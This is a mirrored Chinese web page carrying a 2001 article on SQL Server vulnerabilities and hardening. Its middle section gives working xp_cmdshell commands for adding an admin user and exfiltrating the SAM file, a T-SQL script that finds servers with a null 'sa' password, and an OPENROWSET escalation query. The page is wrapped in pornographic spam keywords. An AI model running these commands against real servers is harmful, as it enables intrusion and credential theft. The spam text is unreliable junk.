亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 8577.htm

?? 數據庫編程技巧文章
?? HTM
?? 第 1 頁 / 共 2 頁
字號:
http://www.csdn.net/develop/library/vc/datebase/8577.shtm
'>
關于SQL SERVER的一些安全問題
</a>
</TD></tr>
<TR>
<TD align=left   width=300>
<B>關鍵字:</B><BR>
sql server
</TD>
<TD align=middle   width=120>
<B>貼文時間</B><br>
2001-6-29 10:23:30
</TD>
<TD align=middle   width=80>
<B>文章類型: </B><BR>
收藏
</TD>
<TD align=middle   width=100>
<B>給貼子投票 </B>
<BR><a href='http://www.csdn.net/develop/addscore.asp?id=
8577
'>投票</a>
</TD></TR>
<TR>
<TD >
&nbsp;
freezwy
&nbsp;&nbsp;
收藏
</TD>
<TD   colSpan=3 vAlign=top>
<B>出處: </B><A href='

'>

</A></TD></TR>
<TR><TD  colSpan=5 bgcolor=#cccc99>&nbsp;</TD></TR>
</TD></TR></TBODY></TABLE>
<div align=center><div class=fst align=left><div class=fstdiv3 id=print2>
<br><br>目前關于nt服務器的入侵,有很多種方法,如對iis的漏洞進行利用,但<br>大家不知道注意到沒有,其實通過與nt服務器相關聯的sql數據庫服務器<br>的例子也是很有比例的一種手段。大家可以參看下面的一個新聞報道:<br>http://www.vnunet.com/news/1110938。<br>herbless入侵破壞的一些站點,如legoland.co.uk站點就是通過sql服務器<br>的入侵而獲得對系統的控制權而破壞的。所以對sql服務器的保護是必不可<br>少的,這里我整理了一些漏洞供大家來參考,見笑,見笑。<br><br>----------------------------------------------------------------<br>我們先來看看sql服務程序支持的網絡協議庫:<br><br>----------------------------------------------------------------<br>| sql server network protocol libraries |<br>----------------------------------------------------------------<br>|protocol library| 可能存在的漏洞 | 是否加密 |<br>----------------------------------------------------------------<br>|named pipes | --使用nt smb端口(tcp139,udp137, | 否 |<br>|(有名管道) | 138)來進行通信,這些可以被通 | |<br>| | 的防火墻控制,但如果內部網絡可 | |<br>| | 隨意訪問的話也是一個不小的缺陷 | |<br>| | --用戶名字,密碼和數據沒有進行加 | |<br>| | 傳輸,任何人可以通過sniffer來 | |<br>| | 進行數據捕獲。 | |<br>----------------------------------------------------------------<br>|ip sockets | --默認狀態下開1433口,你可以使用| 否 |<br>| | 掃描器來查看這個端口。 | |<br>| | 可以被sniffer截獲數據。 | |<br>----------------------------------------------------------------<br>|multi-protocol | --客戶端需要支持nt rpcs;在不同 | 是 |<br>| | 種類的環境中可能引起問題。 | |<br>| | --默認情況下使用tcp隨機端口,但| |<br>| | 防火墻進行端口圖固定實現(參 | |<br>| | 看kb q164667)。 | |<br>| | --需要注意加密選項是否選擇,默 | |<br>| | 是不選擇此選項的。 | |<br>----------------------------------------------------------------<br>|nwlink | --存在被sniffer截獲數據的危險 | 否 |<br>----------------------------------------------------------------<br>|appletalk (adsp)| --存在被sniffer截獲數據的危險 | 否 |<br>----------------------------------------------------------------<br>|banyan vines | --存在被sniffer截獲數據的危險 | 否 |<br>----------------------------------------------------------------<br><br>一般的推薦使用是:如果你能在integrated (nt) security上使用named pipes 或者<br>multi-protocol,那你就使用這些協議庫,如果可能,盡量使用multi-protocol<br>和使能加密選項。如果你上面幾個不能使用,那就使用ip sockets協議,并改變<br>其默認的端口并隨時檢查系統保證無任何sniffer存在。并且,考慮使用一web服<br>務或者com組件作為應用程序的business object layer,并在中間層和sql服務程<br>序中使用安全通道(secure channel)。有不少第三方的產品可以加密這方面的通信。<br><br>-----------------------------------------------------------------------<br>下面再講一下sql server的各種安全模式和它們怎樣進行工作?<br><br>安全模式定義了一些sql server是怎樣認證要使用它們服務的用戶,請看下面<br>sql server 6.5的安全模式和在sql server 7.0做了改變的一些描述和區別:<br><br>-------------------------------------------------------------------<br>|安全模式 | sql server 6.5 | sql server 7.0改變地方 |<br>-------------------------------------------------------------------<br>|standard | --登陸定義在sql server里| --單獨的標準模式在sql server|<br>|標準模式 | 而且給定密碼。 | 沒有使用了。 |<br>| | --sql server的登錄帳戶與| |<br>| | window nt分開 | |<br>-------------------------------------------------------------------<br>|integrated |-使用安全管理器sql的帳 | --在這里成為"windows nt only"|<br>|綜合模式 | 戶。 | 模式。 |<br>| |-用戶在連接到sql server| --只工作在nt系統下,在win9x不|<br>| | 不需要特定分開login和 | 支持。 |<br>| | 密碼。 | |<br>| |-密碼從不存儲在應用程序| --可以直接結合到nt的組中便于 |<br>| | 中,并不以明文在網絡中| 管理,(注意有一builtin組在|<br>| | 傳輸。 | 本地系統上產生). |<br>| |-sql server可以使用nt的| |<br>| | 的認證方式來認證用戶并| |<br>| | 可以使用如帳戶過期等。| |<br>| |-需要named pipe或multi-| |<br>| | protocol庫。 | |<br>--------------------------------------------------------------------<br>|mixed |-提供上面的方式的一些特| --成為sql server和windows nt |<br>|混合性方式 | 征但有后退的東西是客戶| 模式。 |<br>| | 端不能建立可信任連接。| --盡量使用window nt only模式 | |<br>--------------------------------------------------------------------<br><br>登錄只不過是第一步,一旦用戶登錄,用戶必須訪問獨立的數據庫,要使上面<br>的成立,就必須在sysusers表里存在一表目給用戶用的每個數據庫。所以安全<br>請你注意在你的數據庫中是否存在"guest"帳戶和保證不會在你不注意的時候給<br>某些人訪問你的數據庫。<br><br>詳細的大家可以參看微軟的站點:<br><br>http://www.microsoft.com/technet/sql/technote/secure.asp<br><br><br>---------------------------------------------------------------------<br><br>關于sql server存在的一些安全問題:<br><br>存在"sa"帳戶,密碼就為空,而且這個密碼是sql server安全模塊成員,我們就<br>可以通過xp_cmdshell stored procedure(擴展存儲過程)來進行命<br>令操作,如:<br><br>xp_cmdshell "net user testuser ugothacked /add"<br>然后在:<br>xp_cmdshell "net localgroup administrators testuser /add"<br><br>這樣攻擊者就成功的在sql server上增加了一個用戶。<br><br>當然遠程的話,一般需要有1433口開著,通過mysql 客戶端進行連接。<br><br>當然你也可以使用:<br><br>xp_cmdshell "rdisk /s-"<br><br>的方法,這樣就在\winnt\repair目錄里重建了信息而不提示用戶。然后<br>在sam備份以后,攻擊者可以建立一個smb連接到共享或者建立一個連接:<br><br>xp_cmdshell "net share getsam=c:\winnt\repair"<br><br>利用共享獲得這個文件,然后在使用l0phtcrack來跑吧。如果smb端口被防火墻<br>控制了,或者關閉了,攻擊者也可以拷貝sam._文件到web目錄進行匿名瀏覽器<br>下載。如果人家沒有開iis,你何不用tftp呢:).<br><br>ok,通過這臺被控制的sql server服務器,攻擊者可以通過它來查找網絡內部<br>其他機器來擴大戰果,下面是一個sql腳本來列舉網絡中其他sql server存在<br>空帳戶'sa'的示例:<br><br>-----------------------------------------------------------------------<br><br>-- create temp table to store enumerated servers <br><br>set nocount on <br><br>create table #temp (shelldump varchar(255)) <br><br>insert #temp exec xp_cmdshell 'osql -l' <br><br>declare @current_server varchar(255), @conn_string varchar(255) <br><br>declare sql_cursor cursor for select * from #temp <br><br>open sql_cursor fetch next from sql_cursor into @current_server <br><br>-- loop through potential targets and check for null sa accounts <br><br>-- if target is vulnerable, version information will be displayed <br><br>while @@fetch_status = 0 <br><br>begin <br><br>if @current_server &lt;&gt; 'servers:' <br><br>begin <br><br>select @current_server = rtrim(ltrim(@current_server)) <br><br>select @conn_string = 'exec xp_cmdshell ''osql -s' + @current_server + ' -usa -p -q "select @@version"''' <br><br>print 'attempting connection to server: ' + @current_server <br><br>execute (@conn_string) <br><br>print '=====================================================================' <br><br>end <br><br>fetch next from sql_cursor into @current_server <br><br>end <br><br>--clean up <br><br>close sql_cursor <br><br>deallocate sql_cursor<br><br>drop table #temp<br><br>----------------------------------------------------------------------<br><br>當然有些人也可能關閉xp_cmdshell extended stored procedure(擴展存儲過程),<br>我們也可以使用下面的方法:<br><br>xp_regread 'hkey_local_machine', 'security\sam\domains\account', 'f'<br><br>如果mssqlserver 服務在本地系統帳戶下運行,并且如果系統上沒有安裝syskey,上面<br>的調用就可以返回注冊表中加密的密碼或者sid。<br><br>--------------------------------------------------------------------------<br><br>另一個漏洞,是關于adhoc heterogenous queries 來進行權利的提升,請看下面微軟<br>的描述:http://www.microsoft.com/technet/security/bulletin/fq00-014.asp<br><br>關于上面的漏洞,可以使用下面的xploit來獲得權利的提升:<br><br>select * from openrowset('sqloledb','trusted_connection=yes;data source=myserver',<br>'set fmtonly off execute master..xp_cmdshell "dir c:\"')<br><br>這是大家比較喜歡的一種可以執行其他命令,自己想吧。<br><br>---------------------------------------------------------------------------<br><br>還有就是最近的一個漏洞:extended stored procedure parameter parsing (擴展存儲<br>過程參數解析)的漏洞,詳細信息在這個url有介紹:<br>http://www.microsoft.com/technet/security/bulletin/ms00-092.asp。<br><br>起主要問題是在msd中提供一個api函數srv_paraminfo(),它是用來擴展存儲過程調用時<br>解釋深入參數的,如:<br><br>exec &lt;存儲過程名&gt; &lt;參數1&gt;, &lt;參數2&gt;, ...<br>如要查詢“c:\winnt”的目錄樹,可以如下表達:<br>exec xp_dirtree 'c:\winnt'<br><br>但沒有檢查各個參數的長度,傳遞相當長的字符串,就存在了覆蓋其他堆棧<br>參數的可能導致緩沖溢出。<br><br>目前已經知道的過程如下:<br>目前已知受影響的擴展存儲過程如下:<br><br>1、xp_peekqueue (xpqueue.dll)<br>xp_printstatements (xprepl.dll)<br><br>給第一個參數傳遞超長的字符串會覆蓋異常處理程序所保存的返回地址。<br><br>2、xp_proxiedmetadata (xprepl.dll)<br><br>該存儲過程使用4個參數。給第二個參數傳遞超長的字符串會覆蓋異常處<br>理程序所保存的返回地址。<br><br>3、xp_setsqlsecurity (xpstar.dll)<br><br>該存儲過程使用4個參數。給第三個參數傳遞超長的字符串會使整個sql <br>server進程立即終止。<br><br>4、xp_displayparamstmt(xprepl.dll)<br>xp_enumresultset(xprepl.dll)<br>xp_showcolv (xprepl.dll)<br>xp_updatecolvbm (xprepl.dll)<br><br>給第一個參數傳遞超長的串將導致非法操作并覆蓋異常處理程序所保存的返<br>回地址。<br><br>這里告訴大家一個技巧性的東西,如果想要知道這些擴展存儲過程調用了那寫dll<br>文件,你可以如下操作,如:<br><br>select o.name,c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and o.name = 'xp_peekqueue' <br><br>這樣你就可以獲得調用這個擴展存儲過程的dll了,如果微軟沒有出補丁的話,你就<br>暫時把這個dll文件改名吧,當然有些dll文件調用幾個擴展存儲過程,不能盲目更改,<br>否則導致其他的也不能使用,你需要使用下面的操作來知道dll調用那些擴展存儲過程:<br><br>select o.name,c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and c.text = 'xpqueue.dll' <br><br>幸好微軟出了補丁,你可以到下面的地方找到,不用一個一個找dll程序了,呵呵:<br><br>http://support.microsoft.com/support/sql/xp_security.asp<br><br>這個漏洞@stake發現并提供演示的測試代碼,大家可在這里找到:<br><br>http://www.atstake.com/research/advisories/2000/sqladv2-poc.c<br><br>--------------------------------------------------------------------------<br><br>ok,當然sql server也有一些其他漏洞,相對輕微些,如iss發現的管理員<br>login id存儲在注冊表中,其加密的方法比較簡單,很容易獲得,詳細情況<br>請看:http://xforce.iss.net/alerts/advise45.php3。大家可以到其他<br>地方找找。<br><br>---------------------------------------------------------------------<br><br>一些對sql server系統的安全建議:<br><br>--保證打上最新的安全補丁,如下:<br>windows nt 4.0 - service pack 6a<br><br>sql server 6.5 - service pack 5a<br><br>sql server 7.0 - service pack 2. (various hotfixes - check <br>http://www.microsoft.com/download) <br><br>sql server 2000 - hotfix s80233i.exe (intel)<br>當然大家要密切注意微軟的安全公告。<br><br>--不要在ip sockets使用端口1433,如果你使用multi-protocol也請<br>修改端口。<br><br>--不要把'sa'密碼嵌入到任意應用程序如vb/delphi apps里,或者一<br>global.asa文件里,因為"sa"是sql server 的一個默認密碼,其權限<br>類似與windows nt系統里的管理員帳戶,而且密碼為空。<br><br>--改變'sa'和'probe'帳戶的密碼。<br><br>--保證sql server的錯誤記錄在ntfs系統上。<br><br>--如果你不需要xp_cmdshell( use sp_dropextendedproc 'xp_cmdshell' ) <br>就不要把xp_cmdshell extended stored proc(擴展存儲過程) 留在服務<br>器上。在任何isql窗口中輸入:<br>use master<br>sp_dropextendedproc 'xp_cmdshell'<br><br>--丟棄不需要ole自動存儲過程,當然enterprise manager中的某些特征也<br>會不能使用,這些過程包括如下:<br><br>sp_oacreate sp_oadestroy <br><br>sp_oageterrorinfo sp_oagetproperty <br><br>sp_oamethod sp_oasetproperty <br><br>sp_oastop<br><br>--去掉不需要的注冊表訪問過程,如下:<br><br>xp_regaddmultistring <br><br>xp_regdeletekey <br><br>xp_regdeletevalue <br><br>xp_regenumvalues <br><br>xp_regread <br><br>xp_regremovemultistring <br><br>xp_regwrite<br><br>--去掉其他系統存儲過程,如果你認為你覺得你還有威脅,當然<br>要小心drop這些過程,你可以在測試機器上測試,保證你正常的<br>系統能完成工作,這些過程包括:<br><br>sp_bindsession sp_cursor sp_cursorclose<br>sp_cursorfetch sp_cursoropen sp_cursoroption<br>sp_getbindtoken sp_getmbcscharlen sp_ismbcsleadbyte<br>sp_oacreate sp_oadestroy sp_oageterrorinfo<br>sp_oagetproperty sp_oamethod sp_oasetproperty<br>sp_oastop sp_replcmds sp_replcounters<br>sp_repldone sp_replflush sp_replstatus<br>sp_repltrans sp_sdidebug xp_availablemedia<br>xp_cmdshell xp_deletemail xp_dirtree <br>xp_dropwebtask xp_dsninfo xp_enumdsn<br>xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks<br>xp_eventlog xp_findnextmsg xp_fixeddrives<br>xp_getfiledetails xp_getnetname xp_grantlogin<br>xp_logevent xp_loginconfig xp_logininfo<br>xp_makewebtask xp_msver xp_perfend<br>xp_perfmonitor xp_perfsample xp_perfstart<br>xp_readerrorlog xp_readmail xp_revokelogin<br>xp_runwebtask xp_schedulersignal xp_sendmail<br>xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap<br>xp_sprintf xp_sqlinventory xp_sqlregister<br>xp_sqltrace xp_sscanf xp_startmail<br>xp_stopmail xp_subdirs xp_unc_to_drive <br><br>--去掉數據庫中guest用戶。<br>--關閉sql mail兼容能力,防止傳遞一些木馬病毒等。<br>--設置一個任務處理來定時運行下面的程序:<br><br>findstr /c:"login failed" \mssql7\log\*.*'<br><br>再重定向到其他文件或者mail到管理員信箱。<br><br>--經常檢查帶有空密碼的帳戶:<br><br>use master<br>select name,<br>password<br>from syslogins<br>where password is null<br>order by name<br><br>--檢查所有不需要'sa'權限的存儲過程和擴展存儲過程訪問權限:<br><br>use master<br>select sysobjects.name<br>from sysobjects, sysprotects<br>where sysprotects.uid = 0<br>and xtype in ('x','p')<br>and sysobjects.id = sysprotects.id<br>order by name<br><br><br>--保證sql server的傳輸信息在隔離的網絡段中。<br><br><br>
</DIV></div></div>
<script src='../../../get_readnum.asp?id=
8577
'></script>
</center></BODY></HTML>

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
精品国产凹凸成av人导航| 日韩精品一级二级 | 亚洲美女电影在线| 老司机精品视频在线| 色综合久久久久久久久久久| 日韩免费看网站| 亚洲国产aⅴ天堂久久| 懂色av中文字幕一区二区三区| 3d动漫精品啪啪1区2区免费 | 精品粉嫩超白一线天av| 亚洲小说欧美激情另类| 99久久精品国产一区二区三区| 精品免费视频一区二区| 亚洲va韩国va欧美va| 色哟哟一区二区| 国产日韩欧美精品在线| 九色综合狠狠综合久久| 欧美一区在线视频| 亚洲国产日韩a在线播放| 91蝌蚪porny九色| 中文字幕不卡一区| 成人午夜视频在线观看| 中文字幕乱码久久午夜不卡| 久久se精品一区精品二区| 3atv在线一区二区三区| 天堂一区二区在线| 欧美理论片在线| 亚洲高清在线视频| 欧美日韩精品免费观看视频| 婷婷综合在线观看| 欧美一区二区视频免费观看| 午夜精品福利一区二区三区蜜桃| 欧美性大战久久| 性欧美大战久久久久久久久| 5566中文字幕一区二区电影| 日本成人在线电影网| 欧美xxxx在线观看| 国产精品888| 亚洲国产精品黑人久久久| a级高清视频欧美日韩| 亚洲欧洲av一区二区三区久久| 97久久久精品综合88久久| 中文字幕在线不卡一区二区三区 | 亚洲婷婷综合色高清在线| 色先锋资源久久综合| 亚洲一区二区3| 欧美久久高跟鞋激| 日韩精品成人一区二区三区| 91精品国产乱| 国产馆精品极品| 亚洲三级在线免费观看| 欧美美女激情18p| 精品一区二区免费在线观看| 中文字幕+乱码+中文字幕一区| av中文字幕一区| 亚洲不卡一区二区三区| 精品国产一区久久| 色综合天天性综合| 日产国产欧美视频一区精品| 国产香蕉久久精品综合网| 不卡的电影网站| 丝袜诱惑制服诱惑色一区在线观看 | 亚洲第一福利一区| 精品国产不卡一区二区三区| 一本一道久久a久久精品 | 337p亚洲精品色噜噜| 国产乱码精品一区二区三区忘忧草| 国产精品国产馆在线真实露脸| 色综合天天综合| 美女免费视频一区二区| 亚洲欧洲日本在线| 日韩美女一区二区三区四区| 91亚洲男人天堂| 韩国毛片一区二区三区| 亚洲最大成人综合| 久久无码av三级| 欧美综合色免费| 成人午夜激情在线| 日韩av一二三| 亚洲欧美乱综合| www国产亚洲精品久久麻豆| 激情图片小说一区| 国产日韩欧美精品电影三级在线| 欧美三级视频在线| 岛国精品在线观看| 老汉av免费一区二区三区| 夜夜嗨av一区二区三区| 日本一区二区三级电影在线观看 | 视频精品一区二区| 中文字幕中文字幕在线一区| 精品福利av导航| 91精品国产91久久久久久一区二区 | 欧美日韩mp4| 97久久超碰国产精品| 国产一区二区按摩在线观看| 亚洲第一久久影院| 亚洲日本成人在线观看| 中文字幕免费不卡| 久久久精品国产免费观看同学| 欧美一区永久视频免费观看| 欧美体内she精高潮| 91在线视频免费91| 成人免费观看男女羞羞视频| 国产综合久久久久久鬼色 | 91精品国产高清一区二区三区| 在线视频你懂得一区二区三区| 国产白丝精品91爽爽久久| 激情久久五月天| 麻豆一区二区99久久久久| 日韩国产精品久久久| 亚洲第一电影网| 亚洲国产成人av好男人在线观看| 亚洲综合网站在线观看| 亚洲综合丝袜美腿| 亚洲国产日韩av| 午夜私人影院久久久久| 视频一区二区欧美| 日本不卡视频在线| 免费欧美高清视频| 捆绑调教一区二区三区| 麻豆视频观看网址久久| 久久激情五月激情| 国产在线一区观看| 国产精品一卡二| 国产91富婆露脸刺激对白| 懂色av一区二区三区免费看| 粉嫩aⅴ一区二区三区四区| voyeur盗摄精品| 91福利在线看| 欧美一区二区三区的| 欧美精品一区二区三区蜜臀| 国产欧美日韩在线观看| 亚洲免费在线视频一区 二区| 亚洲高清不卡在线观看| 久久精品久久99精品久久| 国产一区二区主播在线| 成人毛片老司机大片| 欧洲一区二区三区在线| 欧美一区二区性放荡片| 国产视频911| 一级中文字幕一区二区| 久久成人羞羞网站| av一区二区三区在线| 欧美在线视频不卡| 久久这里只有精品视频网| 国产精品久久福利| 婷婷国产v国产偷v亚洲高清| 国产伦精品一区二区三区免费| 99精品久久免费看蜜臀剧情介绍| 欧美高清精品3d| 国产女人aaa级久久久级 | 国产精品毛片无遮挡高清| 夜夜夜精品看看| 国产在线观看一区二区| 色婷婷精品久久二区二区蜜臂av | 欧美在线制服丝袜| 欧美不卡一区二区三区四区| 亚洲欧洲韩国日本视频| 热久久一区二区| caoporm超碰国产精品| 欧美电影免费观看完整版| 一区二区三区四区蜜桃 | 亚洲chinese男男1069| 国产精品一二三区在线| 欧美性猛交xxxx黑人交| 欧美国产视频在线| 日韩高清在线电影| 日本高清不卡视频| 国产亚洲一二三区| 麻豆91在线播放免费| 欧美亚洲精品一区| 日韩毛片精品高清免费| 精品一区二区三区影院在线午夜| 欧美色区777第一页| 亚洲欧洲国产日本综合| 国产精品亚洲а∨天堂免在线| 欧美一区二区视频观看视频| 樱花草国产18久久久久| 粉嫩av一区二区三区粉嫩| 精品播放一区二区| 秋霞午夜av一区二区三区| 97久久精品人人爽人人爽蜜臀 | 极品少妇一区二区| 91福利资源站| 中文字幕一区二区不卡| 国产91精品一区二区| 久久一日本道色综合| 欧美a一区二区| 7777精品伊人久久久大香线蕉的| 一区二区免费在线播放| 91久久人澡人人添人人爽欧美| 国产精品国产三级国产三级人妇| 国产一区二区三区在线观看精品 | 制服丝袜在线91| 亚洲午夜私人影院| 欧美日韩国产经典色站一区二区三区| 一区二区在线观看av| 欧美色涩在线第一页| 午夜久久久影院| 91精品婷婷国产综合久久性色 |